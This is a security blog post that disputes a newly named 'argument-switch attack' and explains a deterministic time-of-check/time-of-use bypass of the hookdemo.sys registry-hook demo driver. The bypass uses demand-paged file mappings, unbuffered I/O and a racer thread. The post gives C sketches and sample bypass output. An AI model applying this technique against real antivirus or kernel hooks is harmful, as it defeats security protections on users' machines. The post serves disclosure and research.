Security is Burning - Everything Old is New Again
Every time I convince myself not to make any more public posts, something almost magically occurs to make me change my mind.
The day before yesterday was a particularly boring day, when out of the blue a friend of mine dropped me an email bearing a link along with the following tongue-in-cheek remark:
"Looks familiar, doesn't it? :)))))"
What he linked me to was this URL.
It seems the latest trend in security research right now involves people forging new "names" for ~decade-old security issues. In this particular case, the attack referred to by the Matousec link was generously rechristened an "argument-switch attack". Are we that short on things to talk about? Or maybe we're all just assumed to be amnesiacs by our peers? Who knows.
To cite just a few references (there are many more out there) to the "Awful and Gruesome System Call Wrapper Flaw-By-Design" approach:
- 1) http://seclists.org/bugtraq/2003/Dec/351 - Andrey Kolishak
- 2) http://www.watson.org/~robert/2007woot/2007usenixwoot-exploitingconcurrency.pdf - Robert Watson
- 3) http://events.ccc.de/congress/2007/Fahrplan/events/2353.en.html - myself and twiz
What's funny is that when I re-read what I wrote in that presentation [3], I realized that I'd *also* "forged" a ridiculous new name: "Handle Object Redirect Attacks" -- woot! Go me! It's so irresistible, forging useless new names!!
I don’t want to criticize the work of other researchers, and I tend to think that the Matousec people did find these issues by themselves, spending (wasting?) a lot of time also trying to advise security firms that the issue is present in almost all of their products... Despite that, I can state with a good degree of certainty that almost all of the major AV firms HAVE KNOWN about it for years.
Anyone dealing with this sort of thing also knows why they didn't change or fix anything. Is it worth it, when you weigh the effort of reworking the products' core engines against the real risk? I think not.
As a side-note... we never really thought that any of this was a critical issue, to begin with… after all, I'm pretty sure that by now most people in the security field are aware of the fact that running untrusted native code on a box practically translates to 'ring 0 access'...
but hey -- that's a whole other story entirely. :)
Moreover there is cause to have reasonable doubt about how deep such research has actually been. Citing from their article:
"The argument-switch attack requires specific behavior from system scheduler which is impossible to ensure from user mode."
My first thought was: “Good! Maybe they simply wrote an in-depth analysis only for their customers?” (citing from their article: “The full results of the research were offered to our clients and other software vendors”). Who knows?! :D
Well, stating that the scheduler behavior cannot be controlled at all from userland is a little simplistic. As anybody who has dealt with kernel exploitation knows very well, the kernel can never trust userland. If the vulnerable kernel control path runs in process context and directly references a userland virtual address, you can always force it to perform a deterministic context switch. This works equally well, and of course in one shot, on both multi-processor and uni-processor systems.
I've seen a lot of posts claiming that this vulnerability can be exploited only with a brute-force approach, and that this is reliable within a few tries only on SMP boxes.
That’s NOT true.
With a brute-force approach, sooner or later the check WILL certainly get bypassed, true, but what do you do if the AV engine simply blocks the first attempt by showing a process-blocking pop-up, blacklisting the process, and so on? In my humble opinion, taking this approach accomplishes little more than making the vulnerability completely useless (i.e., even more than it already was to begin with). The bypass MUST work in one shot, every time.
I think it is now time to show the PoC I wrote for the presentation [3] but never released until now. It exploits the “Demand Paging” mechanism together with “Direct I/O” and cache write-through to accomplish the one-shot bypass.
Modern OSs have supported these concepts for ages, and exploiting them to control the context switch is, in most cases, an easy task; Windows is no exception. The PoC demonstrates a one-shot bypass of the famous vulnerable hookdemo.sys driver (written by Andrey Kolishak, see [1]) on uni-processor systems.
The driver simply wraps the ZwOpenKey() system call, trying to prevent access to the following key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
The driver offers two different methods to deny access to the given registry key. The following PoC targets the first (default) hook implementation, which dereferences the userland object twice.
The PoC code is straightforward. It manages two different key names:
A monitored key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”
A fake key: “\HKEY_LOCAL_MACHINE\Software\hookfake\test1”
The userland process issues a system call using the fake key while a racer thread modifies it after the thread issuing the system call gets switched away from the current CPU. Everything works one-shot in a deterministic way. Let’s see how:
The userland process first creates (CreateFile()) a new file with a random name, using the Direct I/O flag (FILE_FLAG_NO_BUFFERING on Windows). Next, respecting the alignment and granularity constraints, the code writes the last, common part of the key (“test1”) into this file (WriteFile()) and closes the handle. Since the Cache Manager cannot rely on the system file cache during the next read of the file, the kernel is forced to access the file on disk, which forces a reschedule. Using the FILE_FLAG_WRITE_THROUGH flag alone is not enough: the data is written to disk immediately, but at the same time the system file cache is filled with the same data, which is reused later.
The next step is the creation of two adjacent memory mappings (CreateFileMapping() and MapViewOfFileEx()). The first is an anonymous mapping. The second is placed right after the first and maps the first section of the aforementioned file. Since Windows uses demand paging, the system just creates an internal structure to keep track of the new mapping and returns. The file data behind the mapping is not pulled into the cache, and no page tables are even set up. Now that the two mappings exist, we can put the first part of the fake key (“\HKEY_LOCAL_MACHINE\Software\hookfake\”) at the very end of the first mapping. This way, the first part of the key string is already in memory, while the contiguous final part exists only on disk and is not yet loaded into memory.
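The alignment constraint is mostly arithmetic: unbuffered I/O on Windows wants transfer sizes that are whole multiples of the volume sector size. As a minimal sketch, assuming a 512-byte sector (real code would query the volume rather than hard-code it), the helpers below pad the 10-byte UTF-16 “test1” fragment up to a full sector. The names round_up and padded_write_size are made up for this illustration and do not come from the PoC.

```c
#include <assert.h>
#include <stddef.h>

/* Round n up to the next multiple of align (align must be a power of two). */
size_t round_up(size_t n, size_t align)
{
    assert(align != 0 && (align & (align - 1)) == 0);
    return (n + align - 1) & ~(align - 1);
}

/* Bytes to hand to a single unbuffered write for a key fragment of
 * `chars` UTF-16 code units (2 bytes each).
 * ASSUMPTION: sector_size is supplied by the caller; 512 is only a common
 * value, not something the original PoC states. */
size_t padded_write_size(size_t chars, size_t sector_size)
{
    return round_up(chars * 2, sector_size);
}
```

For “test1” (5 code units) and a 512-byte sector, padded_write_size(5, 512) yields one full sector, with the key fragment at the start and padding behind it.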
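To make the layout concrete, here is a small portable sketch of the "prefix ends exactly where the first mapping ends" arithmetic. It uses a plain byte buffer in place of the two real views, so it only illustrates the placement, not the paging behaviour. The helper names prefix_offset and place_prefix are hypothetical, and the code assumes the key is stored as little-endian UTF-16 (2 bytes per character).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Byte offset inside the first region at which a prefix of `prefix_chars`
 * UTF-16 code units must start so that it ends on the region's last byte. */
size_t prefix_offset(size_t first_region_bytes, size_t prefix_chars)
{
    size_t prefix_bytes = prefix_chars * 2;
    assert(prefix_bytes <= first_region_bytes);
    return first_region_bytes - prefix_bytes;
}

/* Writes an ASCII prefix as little-endian UTF-16 at the tail of the first
 * region and returns a pointer to the start of the key. `base` stands in
 * for the address of the anonymous view; everything from
 * base + first_region_bytes onward is deliberately never touched, because
 * in the real setup touching it would fault the file-backed page in early. */
uint8_t *place_prefix(uint8_t *base, size_t first_region_bytes,
                      const char *prefix)
{
    size_t n = strlen(prefix);
    uint8_t *start = base + prefix_offset(first_region_bytes, n);
    for (size_t i = 0; i < n; i++) {
        start[2 * i]     = (uint8_t)prefix[i]; /* low byte */
        start[2 * i + 1] = 0;                  /* high byte */
    }
    return start;
}
```

The returned pointer is what would end up as the start of the key string: the characters up to the region boundary are resident, and the character right after the boundary is the first one of “test1” in the file-backed view.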
We can now manually build the system call parameters, putting the address of the key string into the UNICODE_STRING object referenced by the OBJECT_ATTRIBUTES structure.
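A rough sketch of what "manually" means here, using local stand-in structures that mirror the field order of UNICODE_STRING and OBJECT_ATTRIBUTES so the snippet compiles anywhere; real code would use the definitions from the Windows headers instead. The sketch_ names and the choice of the case-insensitive attribute are assumptions made for illustration. The one detail worth noticing is that the length is passed in rather than measured: scanning the string for its terminator would touch the second mapping and fault the page in before the system call does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-ins mirroring UNICODE_STRING and OBJECT_ATTRIBUTES (hypothetical
 * local copies, not the real Windows definitions). */
typedef struct {
    uint16_t  Length;         /* bytes in use, terminator excluded */
    uint16_t  MaximumLength;  /* bytes available in Buffer */
    uint16_t *Buffer;         /* first UTF-16 code unit of the key */
} sketch_unicode_string;

typedef struct {
    uint32_t               Length;  /* size of this structure */
    void                  *RootDirectory;
    sketch_unicode_string *ObjectName;
    uint32_t               Attributes;
    void                  *SecurityDescriptor;
    void                  *SecurityQualityOfService;
} sketch_object_attributes;

#define SKETCH_OBJ_CASE_INSENSITIVE 0x00000040u

/* Fills both structures without reading a single byte of the key itself. */
void sketch_init_key(sketch_unicode_string *name,
                     sketch_object_attributes *oa,
                     uint16_t *key_start, size_t key_chars)
{
    size_t bytes = key_chars * sizeof(uint16_t);
    assert(bytes <= UINT16_MAX);

    name->Length        = (uint16_t)bytes;
    name->MaximumLength = (uint16_t)bytes;
    name->Buffer        = key_start;  /* points into the first mapping */

    oa->Length                   = (uint32_t)sizeof(*oa);
    oa->RootDirectory            = NULL;
    oa->ObjectName               = name;
    oa->Attributes               = SKETCH_OBJ_CASE_INSENSITIVE;
    oa->SecurityDescriptor       = NULL;
    oa->SecurityQualityOfService = NULL;
}
```

For the 43-character key used in this post, key_chars would be 43 and Length would come out as 86 bytes.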
We need to do one last thing before invoking the system call: set up the racer thread. This thread spins on a process-global variable, waiting for its state to change. When the state changes, the racer thread replaces the “hookfake” string with the “hookdemo” string, restoring the original key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
But when will this be done? Let’s take a look at the hookdemo.sys driver:
During the NewZeOpenKey() system call wrapper routine, the code accesses the user-supplied key string at this line:
[ ... ]
rc = RtlAppendUnicodeStringToString(&KeyName, ObjectAttributes->ObjectName);
[ ... ]
ObjectName is the UNICODE_STRING structure holding the reference to our key string. When the driver tries to copy the final part of the key string (the one placed on the second mapping: “test1”) into the local KeyName object, the system generates a page fault since no page tables have been set up yet.
Moreover, the Windows Cache Manager realizes that 1) no cached copy is available and 2) the file I/O and the memory-mapped file MUST NOT pass through the cache (since the file was opened with FILE_FLAG_NO_BUFFERING), so it begins a disk transfer and puts the thread to sleep, thus rescheduling!! At this point the wrapper routine has already copied the first part of the key; when the thread is scheduled back, the routine simply continues copying the remaining part (and everything happens totally transparently from the driver wrapper's perspective).
Just after the context switch occurs, the racer thread modifies the original (already copied) string and exits. Finally, the original system call, which the wrapper invokes next, operates on a different key string: the one we are interested in! Game Over!
Just a side note: to succeed, the two threads need to be serialized. The racer thread must not modify the string before the first thread is scheduled; it has to run only AFTER the first thread has invoked the system call. This is achieved by having the first thread set a global variable on which the racer thread spins. To be sure that the racer thread does not modify the string before the first thread actually performs the system call, we must ensure that the two threads always run on the same processor! Ironically, this code works correctly out of the box ONLY on uni-processor machines. On multi-core/multi-processor systems we have to ensure that all of the process’s threads run on a given CPU using the processor affinity API (e.g. SetProcessAffinityMask()), as shown in the PoC.
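The whole sequence can be replayed in a single-threaded toy model. This is NOT the PoC and not the driver's code: it is a portable simulation under stated assumptions, where a callback stands in for the moment the kernel thread sleeps on the page fault, plain char strings replace UTF-16, and the names wrapped_open, racer_swap and fault_hook are invented for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define KEY_MAX 128

/* Called at the point where the real wrapper would block on the page fault. */
typedef void (*fault_hook)(char *user_key);

static const char *MONITORED =
    "\\HKEY_LOCAL_MACHINE\\Software\\hookdemo\\test1";

/* Toy wrapper. Returns -1 if the check denies the call, 1 if the
 * "original system call" ends up opening the monitored key, 0 otherwise.
 * `split` is the number of characters that are resident before the fault. */
int wrapped_open(char *user_key, size_t split, fault_hook on_fault)
{
    char checked[KEY_MAX];
    size_t len = strlen(user_key);
    assert(len < KEY_MAX && split <= len);

    /* First fetch: the wrapper copies the key for its check. */
    memcpy(checked, user_key, split);        /* resident part is copied   */
    if (on_fault != NULL)
        on_fault(user_key);                  /* thread sleeps, racer runs */
    memcpy(checked + split, user_key + split, len - split);
    checked[len] = '\0';

    if (strcmp(checked, MONITORED) == 0)
        return -1;                           /* access denied */

    /* Second fetch: the original call re-reads user memory. */
    return strcmp(user_key, MONITORED) == 0 ? 1 : 0;
}

/* Racer: swaps the already-copied component back to the monitored name. */
void racer_swap(char *user_key)
{
    char *p = strstr(user_key, "hookfake");
    if (p != NULL)
        memcpy(p, "hookdemo", 8);
}
```

Calling wrapped_open() on the monitored key with no hook is denied; calling it on the fake key with racer_swap as the hook and split set to the length of the “...\hookfake\” prefix passes the check and then opens the monitored key, which is the one-shot behaviour described above.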
This is just a sample output:
TSC Analysis: Before SystemCall = 174341962662283 After SystemCall = 174341962672609
[Diff] => 10326
Called normally: Key Handle: 0xffffffff
TSC Analysis: Before SystemCall = 174341968174781 After SystemCall = 174342017146092
[Diff] => 48971311
Check Bypassed: Game Over! KeyHandle: 0x7bc
As we can see, the first try calls the system call without the special mapping, directly passing the original key string. The wrapper intercepts the call and denies access to the registry key. The second try uses the special mapping described above and, as we can see, the system call returns a valid handle. Note the TSC difference as well: 48971311 cycles against 10326, roughly 4,700 times longer, which is consistent with the calling thread sleeping on the disk read in the middle of the wrapper. Game Over.
The PoC code can be downloaded [here].
The hookdemo.sys code by Andrey Kolishak can be downloaded [here].